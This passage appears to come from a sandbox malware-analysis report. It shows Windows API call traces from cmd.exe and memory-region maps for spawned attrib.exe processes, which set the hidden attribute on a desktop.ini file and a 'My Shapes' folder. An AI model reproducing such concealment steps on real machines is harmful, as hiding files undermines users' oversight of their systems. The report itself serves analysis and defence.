dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cee64 | out: lpAttributeList=0x2ced9c, lpSize=0x2cee64) returned 1 [0236.343] UpdateProcThreadAttribute (in: lpAttributeList=0x2ced9c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cee5c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ced9c, lpPreviousValue=0x0) returned 1 [0236.343] GetStartupInfoW (in: lpStartupInfo=0x2ced58 | out: lpStartupInfo=0x2ced58*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0236.343] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0236.343] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cedf8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cee44 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" ", lpProcessInformation=0x2cee44*(hProcess=0x4c, hThread=0x50, dwProcessId=0xb28, dwThreadId=0xbe0)) returned 1 [0236.345] CloseHandle (hObject=0x50) returned 1 [0236.345] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0236.346] GetEnvironmentStringsW () returned 0x4a2d20* [0236.346] FreeEnvironmentStringsW 
(penv=0x4a2d20) returned 1 [0236.346] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0236.530] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2ced38 | out: lpExitCode=0x2ced38*=0x0) returned 1 [0236.530] CloseHandle (hObject=0x4c) returned 1 [0236.530] _vsnwprintf (in: _Buffer=0x2cee80, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ced44 | out: _Buffer="00000000") returned 8 [0236.530] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0236.530] GetEnvironmentStringsW () returned 0x4a2d20* [0236.530] FreeEnvironmentStringsW (penv=0x4a2d20) returned 1 [0236.530] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0236.530] GetEnvironmentStringsW () returned 0x4a2d20* [0236.530] FreeEnvironmentStringsW (penv=0x4a2d20) returned 1 [0236.530] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ced9c | out: lpAttributeList=0x2ced9c) [0236.530] GetConsoleTitleW (in: lpConsoleTitle=0x2cf180, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.530] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0236.530] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0236.531] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49fe0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0236.531] FindClose (in: hFindFile=0x4a0820 | out: hFindFile=0x4a0820) returned 1 [0236.531] FindClose (in: hFindFile=0x4a0820 | out: hFindFile=0x4a0820) returned 1 [0236.531] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0236.531] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0236.531] GetConsoleTitleW (in: lpConsoleTitle=0x2cef14, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.531] 
InitializeProcThreadAttributeList (in: lpAttributeList=0x2ced9c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2cee64 | out: lpAttributeList=0x2ced9c, lpSize=0x2cee64) returned 1 [0236.531] UpdateProcThreadAttribute (in: lpAttributeList=0x2ced9c, dwFlags=0x0, Attribute=0x60001, lpValue=0x2cee5c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2ced9c, lpPreviousValue=0x0) returned 1 [0236.531] GetStartupInfoW (in: lpStartupInfo=0x2ced58 | out: lpStartupInfo=0x2ced58*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0236.531] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0236.531] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2cedf8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2cee44 | out: lpCommandLine="attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\"", lpProcessInformation=0x2cee44*(hProcess=0x50, hThread=0x4c, dwProcessId=0xb38, dwThreadId=0xbf0)) returned 1 [0236.533] CloseHandle (hObject=0x4c) returned 1 [0236.533] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0236.533] GetEnvironmentStringsW () returned 0x4a3760* [0236.533] 
FreeEnvironmentStringsW (penv=0x4a3760) returned 1 [0236.533] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0236.568] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2ced38 | out: lpExitCode=0x2ced38*=0x0) returned 1 [0236.568] CloseHandle (hObject=0x50) returned 1 [0236.568] _vsnwprintf (in: _Buffer=0x2cee80, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ced44 | out: _Buffer="00000000") returned 8 [0236.568] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0236.568] GetEnvironmentStringsW () returned 0x4a3760* [0236.568] FreeEnvironmentStringsW (penv=0x4a3760) returned 1 [0236.569] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0236.569] GetEnvironmentStringsW () returned 0x4a3760* [0236.569] FreeEnvironmentStringsW (penv=0x4a3760) returned 1 [0236.569] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ced9c | out: lpAttributeList=0x2ced9c) [0236.569] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.569] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0236.569] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.569] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49fd41ac | out: lpMode=0x49fd41ac) returned 1 [0236.569] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.569] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49fd41b0 | out: lpMode=0x49fd41b0) returned 1 [0236.569] SetConsoleInputExeNameW () returned 0x1 [0236.569] GetConsoleOutputCP () returned 0x1b5 [0236.569] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49fd4260 | out: lpCPInfo=0x49fd4260) returned 1 [0236.569] SetThreadUILanguage (LangId=0x0) returned 0x409 [0236.569] exit (_Code=0) Process: id = "647" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16f20" os_pid = "0xa38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "646" os_parent_pid = "0xa40" cmd_line = "attrib -r -s -h 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35692 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35693 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 35694 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 35695 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 35696 start_va = 0x140000 end_va = 0x146fff entry_point = 0x140000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 35697 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35698 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35699 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35700 start_va = 
0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 35701 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35702 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35703 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35704 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35705 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 35706 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 35707 start_va = 0x6efc0000 end_va = 0x6efdcfff entry_point = 0x6efc0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 35708 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35709 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 35710 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") 
Region: id = 35711 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35712 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 35713 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35714 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35715 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35716 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 35717 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35718 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35719 start_va = 0x260000 end_va = 0x327fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 35720 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 
region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35721 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 888 os_tid = 0xa3c Process: id = "648" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16640" os_pid = "0xb28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "646" os_parent_pid = "0xa40" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35722 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35723 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35724 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35725 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 35726 start_va = 0xfc0000 end_va = 0xfc6fff entry_point = 0xfc0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: 
"c:\\windows\\system32\\attrib.exe") Region: id = 35727 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35728 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35729 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35730 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 35731 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35732 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35733 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35734 start_va = 0x70000 end_va = 0x7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 35735 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35736 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 35737 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: 
"c:\\windows\\system32\\ulib.dll") Region: id = 35738 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35739 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 35740 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35741 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35742 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 35743 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35744 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35745 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35746 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" 
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 35747 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35748 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35749 start_va = 0x2e0000 end_va = 0x3a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 35750 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35751 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 889 os_tid = 0xbe0 Process: id = "649" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16780" os_pid = "0xb38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "646" os_parent_pid = "0xa40" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\MYSHAP~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35752 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = 
private name = "private_0x0000000000010000" filename = "" Region: id = 35753 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 35754 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 35755 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 35756 start_va = 0x620000 end_va = 0x626fff entry_point = 0x620000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 35757 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35758 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35759 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35760 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 35761 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35762 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35763 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35764 start_va 
= 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35765 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 35766 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 35767 start_va = 0x6efc0000 end_va = 0x6efdcfff entry_point = 0x6efc0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 35768 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35769 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 35770 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35771 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35772 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 35773 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = 
"\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35774 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35775 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35776 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 35777 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35778 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35779 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 35780 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35781 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 890 os_tid = 0xbf0 Process: id = "650" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16980" os_pid = "0xbf8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = 
